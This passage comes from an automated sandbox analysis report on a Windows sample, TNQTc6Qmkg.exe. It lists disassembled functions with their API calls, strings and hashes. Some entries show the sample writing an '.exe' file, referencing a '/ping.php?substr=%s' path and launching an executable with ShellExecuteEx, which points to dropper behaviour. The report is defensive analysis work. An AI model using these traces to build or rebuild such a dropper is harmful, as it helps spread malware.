Uniqueness Score: -1.00%

Function 0040187F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
std::system_error::system_error.LIBCPMT ref: 004018D8

Strings

ios_base::failbit set, xrefs: 0040189B, 004018D2
ios_base::eofbit set, xrefs: 004018A0
ios_base::badbit set, xrefs: 00401890, 004018B1

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: Exception@8Throwstd::system_error::system_error
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1589814233-1866435925
Opcode ID: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
Instruction ID: e154b9f444e369befffee57ff699e9c141b04c4d0561678f3d19f5bf610271a8
Opcode Fuzzy Hash: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
Instruction Fuzzy Hash: AEF0226280031CB7DB10BAA18C02FEA7B988F0A754F21C03BFD40361E0E77D5A0482ED

Uniqueness

Uniqueness Score: -1.00%

Function 00413A6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002), ref: 00413A8C
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00413A9F
FreeLibrary.KERNEL32(00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000), ref: 00413AC2

Strings

CorExitProcess, xrefs: 00413A97
mscoree.dll, xrefs: 00413A85

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9dff5006f0e47c0e7765be968ad1406b64006eb2177cec7e1fa0986365244e9b
Instruction ID: 222490b34c4e53a5feae2b87ffa662e2080e553be967456abbd25fb90b6b76cf
Opcode Fuzzy Hash: 9dff5006f0e47c0e7765be968ad1406b64006eb2177cec7e1fa0986365244e9b
Instruction Fuzzy Hash: 1EF08130A10218FBDB109F91DC09BAEBFB8EF54752F400069F809A2290DB344E45CA9C

Uniqueness

Uniqueness Score: -1.00%

Function 05D0ABB7 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
Instruction ID: 8a359e14c45651228645608f035b409ab28a29202d4d86ad510780458da2c827
Opcode Fuzzy Hash: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
Instruction Fuzzy Hash: 9F717035A043169BCB25DF54C884BBEBB76FF41361F18522AE851A72D0E7709982C7B0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A950 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00476586db13df40ae9b4ca52299d21b8cb0f2ee272e828588998c86b833e952
Instruction ID: b33920a143986800139fcf22d81ba1a33bebe7e0c53b62ede7835c02ac38fde1
Opcode Fuzzy Hash: 00476586db13df40ae9b4ca52299d21b8cb0f2ee272e828588998c86b833e952
Instruction Fuzzy Hash: 9E712A71D062969BCB308F94C844AFFBB76EF41360F14022BE91457280D774ACE1C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 05D052CA Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 05D0533C
_free.LIBCMT ref: 05D0535C

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
Instruction ID: b44a348ea030c3f2a9a2e64aef92cf816a96e42b561a2f897ee081d6ec3143e6
Opcode Fuzzy Hash: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
Instruction Fuzzy Hash: 5B41F136A003049FDB24DF78D884B6DB7B2FF85314B15556AD955EB290DA31E901CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00415063 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004150D5
_free.LIBCMT ref: 004150F5

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
Instruction ID: 119d67276799711db09ecd5bf14b9939420992e10a89990823b09dedeceb6b84
Opcode Fuzzy Hash: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
Instruction Fuzzy Hash: F941E232E00700EBCB15DF79C880A9EB7B1EF89318B1545AAE515EB392D634AD41CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0041B300 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0041197C,?,00000000,?,00000001,?,?,00000001,0041197C,?), ref: 0041B34D
__alloca_probe_16.LIBCMT ref: 0041B385
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0041B3D6
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00410DD1,?), ref: 0041B3E8
__freea.LIBCMT ref: 0041B3F1

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: d59019c36856c0d038f4f00fa65e6381e0e9e1f4e06c47476786303ee0ade61e
Instruction ID: fe6b59a793102c77a27ef18a3bbb39662c21b96f940faf78fbed62ac6a6f166a
Opcode Fuzzy Hash: d59019c36856c0d038f4f00fa65e6381e0e9e1f4e06c47476786303ee0ade61e
Instruction Fuzzy Hash: 3831BF72A0021A9BDB249F65CC41EEF7BA5EB40310F04012EFC14D7291EB39DDA1CB99

Uniqueness

Uniqueness Score: -1.00%

Function 05D0E66A Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 05D0E673
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 05D0E696

Part of subcall function 05D07CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05D07CDE

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 05D0E6BC
_free.LIBCMT ref: 05D0E6CF
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 05D0E6DE

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: a2b97d9722a52550099a0d12c6cf1aac4d01039bf2330feb9bda49d958931312
Instruction ID: 92372c3d791ba24b1bee5b2e57f6b3afc6f1caa5ac1b76cb6c6bad4e8eabc7e6
Opcode Fuzzy Hash: a2b97d9722a52550099a0d12c6cf1aac4d01039bf2330feb9bda49d958931312
Instruction Fuzzy Hash: 2201D472B052157B633116B66C8CE7B7B6DEAC2AA0394193BF909D6280DE61CC02D1B9

Uniqueness

Uniqueness Score: -1.00%

Function 0041E403 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0041E40C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041E42F

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041E455
_free.LIBCMT ref: 0041E468
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041E477

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: a34debf33ccdb7c840dc0c30cab86c6cd241ab08fa36fff5cfa760907aeefc26
Instruction ID: e222fc366bdc9891f1000934aff4c77bc857fdd668f389f9b834644977e06484
Opcode Fuzzy Hash: a34debf33ccdb7c840dc0c30cab86c6cd241ab08fa36fff5cfa760907aeefc26
Instruction Fuzzy Hash: 9001847AA012157B27211AB75C8CDFB6A6DDEC6FA4315012AFD08D3201DE688C82C5B9

Uniqueness

Uniqueness Score: -1.00%

Function 05D07004 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,05D025ED,05D07307,?,05D06FAE,00000001,00000364,?,05CFE697,?,?,?,05CFED94,?), ref: 05D07009
_free.LIBCMT ref: 05D0703E
_free.LIBCMT ref: 05D07065
SetLastError.KERNEL32(00000000), ref: 05D07072
SetLastError.KERNEL32(00000000), ref: 05D0707B

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction ID: 353481b04d385a037086cc1ebdb5fede21945ee67f47aa879195f2b759c20901
Opcode Fuzzy Hash: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction Fuzzy Hash: 6301D1767446006B963267796C8CF6F223EEBC1271B202227F416AA2D0EE61E8928175

Uniqueness

Uniqueness Score: -1.00%

Function 00416D9D Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00412386,004170A0,?,00416D47,00000001,00000364,?,0040E430,?,?,?,0040EB2D,?), ref: 00416DA2
_free.LIBCMT ref: 00416DD7
_free.LIBCMT ref: 00416DFE
SetLastError.KERNEL32(00000000), ref: 00416E0B
SetLastError.KERNEL32(00000000), ref: 00416E14

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction ID: 6e49a9887b0250ccd633565296769d6b3062fe87a49412782ccaa8615f8c8364
Opcode Fuzzy Hash: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction Fuzzy Hash: C201F9363847106792217676BC85EEB262D9BC5374763027FF819922D2EF3DCC92505D

Uniqueness

Uniqueness Score: -1.00%

Function 0041ED6E Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041ED86

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 0041ED98
_free.LIBCMT ref: 0041EDAA
_free.LIBCMT ref: 0041EDBC
_free.LIBCMT ref: 0041EDCE

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 12b51190f65240c3d2ef2a1ad5896f3b430592fd2ccf38004c9c9016fab84203
Instruction ID: d5ef32133b98e4fb2412931fa35fae6bc57e2fe493cbd1108eefdbae164f4dde
Opcode Fuzzy Hash: 12b51190f65240c3d2ef2a1ad5896f3b430592fd2ccf38004c9c9016fab84203
Instruction Fuzzy Hash: 6DF04F32544310ABCA20EB6AF885DDB73E9BA44714755181AF848D7640C638FCC0865D

Uniqueness

Uniqueness Score: -1.00%

Function 05D05519 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 05D05537

Part of subcall function 05D06501: HeapFree.KERNEL32(00000000,00000000,?,05D0F288,?,00000000,?,00000000,?,05D0F52C,?,00000007,?,?,05D0F920,?), ref: 05D06517
Part of subcall function 05D06501: GetLastError.KERNEL32(?,?,05D0F288,?,00000000,?,00000000,?,05D0F52C,?,00000007,?,?,05D0F920,?,?), ref: 05D06529

_free.LIBCMT ref: 05D05549
_free.LIBCMT ref: 05D0555C
_free.LIBCMT ref: 05D0556D
_free.LIBCMT ref: 05D0557E

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction ID: d6c581b52540ce9a2c4c6032375347a54b35d8d317fefbfb72152168d5e33ffa
Opcode Fuzzy Hash: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction Fuzzy Hash: 58F0BDB09115109BDA26AF54FC487193761FB04710312756FE514562BCDF3686A1CEDA

Uniqueness

Uniqueness Score: -1.00%

Function 004152B2 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004152D0

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 004152E2
_free.LIBCMT ref: 004152F5
_free.LIBCMT ref: 00415306
_free.LIBCMT ref: 00415317

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction ID: 804699b6a5c80bac2842bae3f4e6e7460cbec33686f784624dec7bd42b1af61a
Opcode Fuzzy Hash: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction Fuzzy Hash: 41F030714413209B8A16BF15FC416893B60FB4871831275AFF50866275CB3959918FCE

Uniqueness

Uniqueness Score: -1.00%

Function 0041608E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Strings

@, xrefs: 0041618D

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2895899722
Opcode ID: 307271cf07234a17719cc341c6256f3d9491265c04953d18a9bfb7d8f1260d71
Instruction ID: ae3557305dc9c54a6d59b1edd30c6b9f9c56a404ae947bd98c264bdf0008d32a
Opcode Fuzzy Hash: 307271cf07234a17719cc341c6256f3d9491265c04953d18a9bfb7d8f1260d71
Instruction Fuzzy Hash: EF51D171D00209ABDB10AFA9C845FEF7BB8AF45314F12015BE804B7292D778D982CB69

Uniqueness

Uniqueness Score: -1.00%

Function 05D0352A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\TNQTc6Qmkg.exe,00000104), ref: 05D0356A
_free.LIBCMT ref: 05D03635
_free.LIBCMT ref: 05D0363F

Strings

C:\Users\user\Desktop\TNQTc6Qmkg.exe, xrefs: 05D03561, 05D03568, 05D03597, 05D035CF

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\TNQTc6Qmkg.exe
API String ID: 2506810119-2181145923
Opcode ID: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
Instruction ID: c4ade8bd5711b7ffe0b981d80b37ba00f4a98710ac9c88130b0f46b2835d8e34
Opcode Fuzzy Hash: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
Instruction Fuzzy Hash: 6631B2B1A04258AFDB21DF99DC88FAEBBFDEB85710F105467E50597290DB70CA40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004132C3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\TNQTc6Qmkg.exe,00000104), ref: 00413303
_free.LIBCMT ref: 004133CE
_free.LIBCMT ref: 004133D8

Strings

C:\Users\user\Desktop\TNQTc6Qmkg.exe, xrefs: 004132FA, 00413301, 00413330, 00413368

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\TNQTc6Qmkg.exe
API String ID: 2506810119-2181145923
Opcode ID: 7252df08df779396c6a9f828a3f268b946ea2b753614b366170cf5b7b8345a46
Instruction ID: e0cf6dde0ac7f492d26fb7a27bfd3cf8f71fda75d9391d43b3cd8632259efb82
Opcode Fuzzy Hash: 7252df08df779396c6a9f828a3f268b946ea2b753614b366170cf5b7b8345a46
Instruction Fuzzy Hash: 72319371A0021CABDB219F9698819DEBBB8EB85315F1041ABED14D7210DB799A81CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 05D16777 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40synchronizationCOMMON

Download Yara Rule

APIs

ShellExecuteEx.SHELL32(?), ref: 05D167B9
WaitForSingleObject.KERNEL32(?,00008000), ref: 05D167CD
CloseHandle.KERNEL32(?), ref: 05D167D6

Strings

.exe, xrefs: 05D16782

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: CloseExecuteHandleObjectShellSingleWait
String ID: .exe
API String ID: 3837156514-4119554291
Opcode ID: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction ID: 83965656ada51ac746576e9e6aa24391db129e7a31d7ec19e10ba56d2a8eb695
Opcode Fuzzy Hash: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction Fuzzy Hash: 0A017831E0021CEBDF15DFA9E8459DDBBB8FF08740F008126F801A6260EB709A45CF84

Uniqueness

Uniqueness Score: -1.00%

Function 05D164A9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,.exe,00000000,?,?,05D15B74,00000001,?,/ping.php?substr=%s), ref: 05D164C4
WriteFile.KERNEL32(00000000,?,?,00000001,00000000,?,05D15B74,00000001,?,/ping.php?substr=%s,?), ref: 05D164DC
CloseHandle.KERNEL32(00000000,?,05D15B74,00000001,?,/ping.php?substr=%s,?), ref: 05D164E5

Strings

.exe, xrefs: 05D164AE

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: .exe
API String ID: 1065093856-4119554291
Opcode ID: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction ID: c2386cb752dd9204bfc00167bc1a58a135f967d9eedb077fc097ae62e585692e
Opcode Fuzzy Hash: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction Fuzzy Hash: B0E06572601124BBD7311B99AC48FA7BE6CEF855A0F040125FB05D21109661DC0197B8

Uniqueness

Uniqueness Score: -1.00%

Function 05D07FD6 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 05D08061
__alldvrm.LIBCMT ref: 05D08262
__alldvrm.LIBCMT ref: 05D08284

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
Instruction ID: 9f6d9696b84bcf24ccd742302a98f916931f727bb7a224befeee8c5d89b2fbcf
Opcode Fuzzy Hash: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
Instruction Fuzzy Hash: F0A15632E05786AFDB25CF68C880BBEBBE5FF11350F14416BD9959B2C1C6388941D761

Uniqueness

Uniqueness Score: -1.00%

Function 00417D6F Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00417DFA
__alldvrm.LIBCMT ref: 00417FFB
__alldvrm.LIBCMT ref: 0041801D

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: c52314c68bb5d2cd0ec3ccb49d1868c21592631552be694c337c0e3ca6bae7eb
Instruction ID: fd8853d8f1522a73f401650a4168fe8705857821074eec12fc08c2aeadde5945
Opcode Fuzzy Hash: c52314c68bb5d2cd0ec3ccb49d1868c21592631552be694c337c0e3ca6bae7eb
Instruction Fuzzy Hash: 9EA11272A083869FDB218E18C881BEBBBF1EF55354F1441AEE5859B281D63C8982C758

Uniqueness

Uniqueness Score: -1.00%

Function 05D12AD6 Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 05D12C05

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 0327c6b289028ba5b2b3c2fb758003783598fcbdb2bec9316035b6f17d33412a
Instruction ID: 64955bac524ba1b7a5d1c9540d85ddefda7dd8527dc728540027a84c5a93bf0d
Opcode Fuzzy Hash: 0327c6b289028ba5b2b3c2fb758003783598fcbdb2bec9316035b6f17d33412a
Instruction Fuzzy Hash: 44412B39B002157BDB25AFBAAE8CB7E36A6FF05331F140217FD18D62D4DA3685408279

Uniqueness

Uniqueness Score: -1.00%

Function 0042286F Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0042299E

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 438df31e4ca0038dfaee660d81f95d1ac1cde2fe31961a88ef6aff440cd1ee1d
Instruction ID: 928e3cb369f2e27a6f9c5d6c25e794823a6f45c2d4bbec1796fd6aa098e8f7c9
Opcode Fuzzy Hash: 438df31e4ca0038dfaee660d81f95d1ac1cde2fe31961a88ef6aff440cd1ee1d
Instruction Fuzzy Hash: B2411B71B002247BDB206B7A9D41BAE36A4EF05334F54021BF818D6291D6FC8DC19669

Uniqueness

Uniqueness Score: -1.00%

Function 05D0B567 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,0042E790,00000000,00000000,8B56FF8B,05D04002,?,00000004,00000001,0042E790,0000007F,?,8B56FF8B,00000001), ref: 05D0B5B4
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 05D0B63D
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 05D0B64F
__freea.LIBCMT ref: 05D0B658

Part of subcall function 05D07CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05D07CDE

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 4c9fcdccec6534139f4d5072acc38e80a3e5bc7209392af5cdc3591196cc905b
Instruction ID: d23d0bbdb0512a1134f358d965eef10d5423b09747b113550607dc553a334920
Opcode Fuzzy Hash: 4c9fcdccec6534139f4d5072acc38e80a3e5bc7209392af5cdc3591196cc905b
Instruction Fuzzy Hash: 3831C371A0420AABEF24DF65CC44EBE7BA5EF40210F44056AED45DB190D735CD60CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 05CFCF11 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

